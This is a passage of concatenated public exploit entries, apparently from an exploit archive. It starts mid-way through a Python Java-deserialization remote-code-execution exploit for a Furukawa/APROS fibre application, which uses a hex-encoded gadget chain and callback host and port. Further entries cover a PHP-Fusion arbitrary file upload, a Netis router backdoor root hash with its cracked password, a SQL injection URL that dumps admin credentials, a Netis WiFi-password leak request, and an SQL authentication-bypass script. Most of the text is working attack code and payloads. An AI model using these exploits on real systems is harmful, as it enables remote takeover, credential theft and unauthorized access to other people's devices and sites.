b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61" payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74" payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B" payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68" payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66" payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E" payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F" payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A" payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00" payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61" payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C" payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72" payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61" payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65" payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43" payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72" payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72" payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72" payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F" payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73" payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72" payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E" payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73" payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00" payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70" payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C" payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E" payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D" payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69" payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72" payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69" payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72" payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D" payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66" payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72" payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38" payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A" payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C" payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C" payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B" payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12" payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73" payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E" payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C" payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75" payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C" payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A" payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D" payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00" payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00" payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69" payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63" payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00" payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61" payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2" payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################" payload += (bytes(self.cmd, "utf-8"))############################################" payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01" payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61" payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2" payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65" payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D" payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00" payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E" payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00" payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09" payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00" payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######" jbits = BytesIO() with gzip.GzipFile(fileobj=jbits, mode="wb") as f: f.write(payload) serialize = base64.b64encode(jbits.getvalue()) print("[*] Sending serialized object") self.headers = { "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn", "Content-Type" : "application/x-www-form-urlencoded", "User-Agent" : "ISP-Eye/2.51", "Connection" : "keep-alive"} self.paramz={"javax.faces.ViewState" : serialize} #sleep(1) r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz) def par(self): if len(sys.argv) != 4: self.usage() else: self.target = sys.argv[1] self.callback = sys.argv[2] self.lport = int(sys.argv[3]) if not "http" in self.target: self.target = "http://{}".format(self.target) def check(self): print("[*] Setting up valid URL path") try: r = requests.get(self.target) app = r.text if not "FURUKAWA" in app and not "APROS" in app: print("[!] App not detected.") exit(0) if "FURUKAWA" in app: self.path = "/FURUKAWA/" elif "APROS" in app: self.path = "/APROS/" else: exit(-1337) except Exception as p: print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p)) exit(0) def framed(self): naslov = """ o===--------------------------------------===o | | | Furukawa Electric / Tecnored | | APROS Evolution | FURUKAWA | ConsciusMAP | | Fiber-To-The-Home (FTTH) | | | | Java Deserialization Remote Code Execution | | ZSL-2020-5565 | | | o===--------------------------------------===o || || (\__/)|| (•ㅅ•)|| / 　 づ| """ print(naslov) def usage(self): self.framed() print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>") print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n") exit(0) def main(self): self.par()########() self.check()######() self.thricer()####() if __name__ == '__main__': Optics().main()

# Exploit Title: PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload # Date: 2020-04-24 # Author: Besim ALTINOK # Vendor Homepage: https://www.php-fusion.co.uk/home.php # Software Link: https://sourceforge.net/projects/php-fusion/files/PHP-Fusion%20Archives/9.x/PHP-Fusion%209.03.50.zip/download # Version: v9.03.50 # Tested on: Xampp # Credit: İsmail BOZKURT and AkkuS ------------------------------------------------------------------------------------------------- Description --- - This system does not check the file extension when user upload photo for avatar :). So you can upload PHP file like: Content of the file -- Sample PHP code: <? phpinfo(); ?> Name of the file: --- Sample PHP File name: tester.php - When you want to try to upload the image to the avatar, just, try to change the file name and content. ---------------------------------------------------------------------------------------- Vulnerable code section in the UserFieldsInput.inc ---------------------------------------------------------- private function _setUserAvatar() { if (isset($_POST['delAvatar'])) { if ($this->userData['user_avatar'] != "" && file_exists(IMAGES."avatars/".$this->userData['user_avatar']) && is_file(IMAGES."avatars/".$this->userData['user_avatar'])) { unlink(IMAGES."avatars/".$this->userData['user_avatar']); } $this->data['user_avatar'] = ''; } if (isset($_FILES['user_avatar']) && $_FILES['user_avatar']['name']) { // uploaded avatar if (!empty($_FILES['user_avatar']) && is_uploaded_file($_FILES['user_avatar']['tmp_name'])) { $upload = form_sanitizer($_FILES['user_avatar'], '', 'user_avatar'); if (isset($upload['error']) && !$upload['error']) { // ^ maybe use empty($upload['error']) also can but maybe low end php version has problem on empty. $this->data['user_avatar'] = $upload['image_name']; } } } }

# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root) # Date: 2020-04-25 # Author: Besim ALTINOK # Vendor Homepage: http://www.netis-systems.com # Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204 # Version: V1.2.32533 # Tested on: Netis E1+ V1.2.32533 # Credit: İsmail BOZKURT ----------------------------- *root:abSQTPcIskFGc:0:0:root:/:/bin/sh* Created directory: /home/pentestertraining/.john Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16]) Press 'q' or Ctrl-C to abort, almost any other key for status Warning: MaxLen = 13 is too large for the current hash type, reduced to 8*realtek (root)* 1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5 Use the "--show" option to display all of the cracked passwords reliably Session completed

# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection # Exploit Author : Majid kalantari # Date: 2020-04-26 # Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced # Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip # Version: - # Tested on: Windows 10 # CVE: N/A =============================================== # vulnerable file: product.php # vulnerable parameter : p # payload : http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23# ! #Description: ($product_id input is not safe) Line 46: $product_id = $_GET['p']; $sql = " SELECT * FROM products "; $sql = " SELECT * FROM products WHERE product_id = $product_id"; ===============================================

# Exploit Title: Netis E1+ 1.2.32533 - Unauthenticated WiFi Password Leak # Date: 2020-04-25 # Author: Besim ALTINOK # Vendor Homepage: http://www.netis-systems.com # Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204 # Version: V1.2.32533 # Tested on: Netis E1+ V1.2.32533 # Credit: İsmail BOZKURT ----------------------------- HTTP Request ------------------------------------------- GET //netcore_get.cgi HTTP/1.1 Host: netisext.cc User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: homeFirstShow=yes Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Detail of the HTTP Response: ------------------------------------------- hange_name':'[ ]','ddns_domain':'','ddns_info':'[ ]','time_now':'01/14/2015 09:58:51','timezone':'-8 1','time_type':'1','daylight_save':'1','time_server':'65.55.56.206','time_date':'2015','time_date2':'1','time_date3':'14','time_time':'9','time_time2':'58','time_time3':'51','old_user':'','def_pwd_flag':'1','old_pwd':'','wakeup_mac':'00:00:00:00:00:00','rp_config_status':'35','rp_client_status':'3','rp_ap_ssid':'ExampleSSID','rp_ap_password':'WiFiPass123','rp_ap_users':'1','rp_client_ssid':'TestSSID','rp_client_bssid':'98:e7:f5:ab:95:ad','rp_client_password':'WiFiPass123','rp_client_time':'357','rp_client_signals':'65','rp_client_speeds':'117','rp_roaming_onoff':'16','rp_soon_ssid':'TestSSID','rp_soon_password':'WiFiPass123','rr_current_mode':'1','rp_diagnose_status':'0',"statistics_list":[{'type':'LAN','tx_pack':'0','rx_pack':'0','t

# Exploit Title: Online Course Registration 2.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-04-25 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/online-course-registration-free-download/ # Version: 2.0 # Tested on: Kali Linux x64 5.4.0 # CVE : N/A #There are multiple SQL injection vulnerabilities in Online Course Registration #PHP script: #./check_availability.php: $result =mysqli_query($con,"SELECT studentRegno FROM courseenrolls WHERE course='$cid' and studentRegno=' $regid'"); #./check_availability.php: $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'"); #./check_availability.php: $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'"); #./change-password.php:$sql=mysqli_query($con,"SELECT password FROM students where password='".md5($_POST['cpass'])."' && studentRegno='".$_SESSION['login']."'"); #./admin/check_availability.php: $result =mysqli_query($con,"SELECT StudentRegno FROM students WHERE StudentRegno='$regno'"); #./admin/change-password.php:$sql=mysqli_query($con,"SELECT password FROM admin where password='".md5($_POST['cpass'])."' && username='".$_SESSION['alogin']."'"); #./admin/index.php:$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'"); #./index.php:$query=mysqli_query($con,"SELECT * FROM students WHERE StudentRegno='$regno' and password='$password'"); #./includes/header.php: $ret=mysqli_query($con,"SELECT * from userlog where studentRegno='".$_SESSION['login']."' order by id desc limit 1,1"); #./pincode-verification.php:$sql=mysqli_query($con,"SELECT * FROM students where pincode='".trim($_POST['pincode'])."' && StudentRegno='".$_SESSION['login']."'"); #It is also possible to bypass the authentication in the two login pages: #!/usr/bin/python3 try: from termcolor import colored from colorama import init import argparse import requests except: print("Please run pip3 install termcolor,colorama,argparse,requests") init() symbol_green=colored("[+]", 'green') symbol_red=colored("[-]", 'red') parser = argparse.ArgumentParser() parser.add_argument('url', help='The URL of the target.') args = parser.parse_args() adminurl = args.url + '/onlinecourse/admin/' def main(): initial='Online Course Registration Authentication Bypass in %s' % ( args.url ) + "\n" print(colored(initial, 'yellow')) sess = requests.session() data_login = { 'username': "admin' or 1=1 -- ", 'password': 'whatever', 'submit': '' } try: req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True) resp_code = req.status_code except: print(symbol_red+" The request didn't work!\n") exit() if resp_code == 200 and "document.chngpwd.cpass.value" in req.text: print(symbol_green+" Authentication bypassed for admin user!\n") print(symbol_green+" To test this manually, visit: " + adminurl+ " and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n") else: print(symbol_red+" Fail!") main()